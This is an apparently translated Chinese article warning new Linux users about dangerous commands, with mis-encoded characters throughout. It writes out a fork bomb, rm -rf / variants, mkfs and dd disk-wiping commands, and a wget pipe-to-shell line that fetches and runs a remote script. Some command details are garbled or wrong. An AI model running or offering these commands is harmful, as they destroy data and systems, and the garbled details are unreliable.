在一些情況下,Linux 甚至不會(huì)詢問你而直接執(zhí)行命令,導(dǎo)致你丟失各種數(shù)據(jù)信息。
一般來說在 Web 上推薦新的 Linux 用戶執(zhí)行這些命令,當(dāng)然,也有人哪些寫過這代碼的人不這么想,因?yàn)檫@玩意你一寫下去就不是玩笑了。
這里我收集了一些對系統(tǒng)有危害的 Linux 代碼,幫助你避免他們。請記住:這些代碼非常危險(xiǎn),甚至可以經(jīng)過修改,變得更加有危害性。
還有一些事情需要注意:一些命令只在 Ubuntu 中有 sudo 前綴時(shí)是有危害的。其他發(fā)行版本的 Linux,則是在作為根目錄命令時(shí)會(huì)有危害。
1. Linux Fork Bomb Command:(){ :: & };: 以 Fork Bomb 聞名,是一個(gè)拒絕服務(wù)攻擊的 Linux 系統(tǒng)。:(){ :: & };: 是一個(gè) bash 函數(shù)。只要被執(zhí)行,他會(huì)不斷重復(fù),直到系統(tǒng)被凍結(jié)。
你只能重啟系統(tǒng)解決這個(gè)問題。所以當(dāng)你在 Linux 界面執(zhí)行這個(gè)命令時(shí)一定要注意。
2. Mv Folder/Dev/Null Commandmv folder/dev/null 也是一個(gè)危險(xiǎn)的命令。Dev/null 或者 null device 是一個(gè)刪除所有寫在這個(gè)設(shè)備文件上數(shù)據(jù)的設(shè)備文件,但是,該操作提示卻是寫入操作執(zhí)行成功。這就是我們常說的 bit bucked 或者 black hole。
3. Rm -Rf Commandrm -rf命令在 Linux 系統(tǒng)中可以快速刪除文件夾及其內(nèi)容。如果,你不知道如何正確使用它,你就只有哭了。
列下m-rf 命令最常見的組合和選擇:
rm command :刪除 Linux 系統(tǒng)的文件
rm -f command:不需提示,刪除文件中的只讀文件
rm -r command 循環(huán)刪除文件夾的內(nèi)容
rm -d command :刪除空目錄,如果非空目錄則不會(huì)執(zhí)行該操作
rm -rf/ command:強(qiáng)制刪除根目錄中的所有內(nèi)容和子文件夾(包括寫保護(hù)文件)命令。
rm -rf* command :強(qiáng)制刪除當(dāng)前目錄中的所有內(nèi)容(當(dāng)前工作目錄)和字文件夾
rm -rf. command:強(qiáng)制刪除當(dāng)前文件夾目錄/子目錄中的所有內(nèi)容 。同 rm -r.[^.]*
The rm -r.[^.]* command :刪除文件及文件夾,帶有刪除提示
4. Mkfs Command如果你不知 mkfs 的作用,那么它也是一個(gè)危險(xiǎn)的命令,mkfs 之后寫的任何命令都將會(huì)被一個(gè)空白的 linux 文件系統(tǒng)格式化、替代。
下面列舉出需要管理員權(quán)限,格式化硬盤的命令:
mkfs
mkfs.ext3
mkfs.bfs
mkfs.ext2
mkfs.minix
mkfs.msdos mkfs.reiserfs
mkfs.vfat
mkfs.cramfs 也可以和上面的代碼做同樣的事情,不過不需要管理源權(quán)限。
5. Tar Bombtar 命令用于將多個(gè)文件以 .tar 格式放入一個(gè)文件中(存檔文件)。Tape Archive (Tar) bomb 可以由他創(chuàng)建。
當(dāng)為壓縮時(shí),就是這個(gè)存檔文件生成數(shù)以萬計(jì)的相似名稱文件出現(xiàn)在當(dāng)前目錄中而不是新目錄。
當(dāng)收到 tar 文件,定期創(chuàng)建一個(gè)新的保護(hù)目錄,然后在解壓前將接受的 tar 文件放到這個(gè)目錄中,你可以避免成為 tar bomb 的受害者。
6. Dd CommandDd命令用于復(fù)制&改變硬盤分區(qū)。如果,你用錯(cuò)地方了,那么也很危險(xiǎn)。
下面列舉 dd 命令:
dd if=/dev/hda of=/dev/hdb
dd if=/dev/hda of=/dev/sdb
dd if=something of=/dev/hda
dd if=something of=/dev/sda
下面這個(gè)命令會(huì)將整個(gè)主硬盤清零:dd if=/dev/zero of=/dev/had
7. Shell Script Code有時(shí)候,你可能會(huì)被人坑,給你一個(gè) shell 腳本文件,讓你去下載并執(zhí)行它。該腳本可能會(huì)包含一些惡意的或危險(xiǎn)的代碼。命令形式可能會(huì)是這樣:wget http://some_malicious_source -O- sh。 wget 將會(huì)在 sh 狹隘腳本時(shí)下載腳本。
8. Malicious Source Code也許有人會(huì)給你源代碼讓你編譯他。代碼可能是正常代碼,不過,有一些惡意代碼偽裝在大型源代碼中,如果是這樣,你的系統(tǒng)就中槍了。如何避免?僅接受并編譯可信賴來源的源代碼。
9. Decompression Bomb你已經(jīng)收到一個(gè)壓縮文件,你被要求提取這個(gè)看起來很小的文件,可能小到 KB。事實(shí)上,該小尺寸的壓縮文件包含高度壓縮數(shù)據(jù)。
只要文件解壓,上百 GB 數(shù)據(jù)會(huì)被提取,這時(shí)候,過大的數(shù)據(jù)填滿硬盤導(dǎo)致宕機(jī),幾率就很大了。如何避免?還是那句老話,別手賤,什么文件都去接收,請接收可信任來源文件。
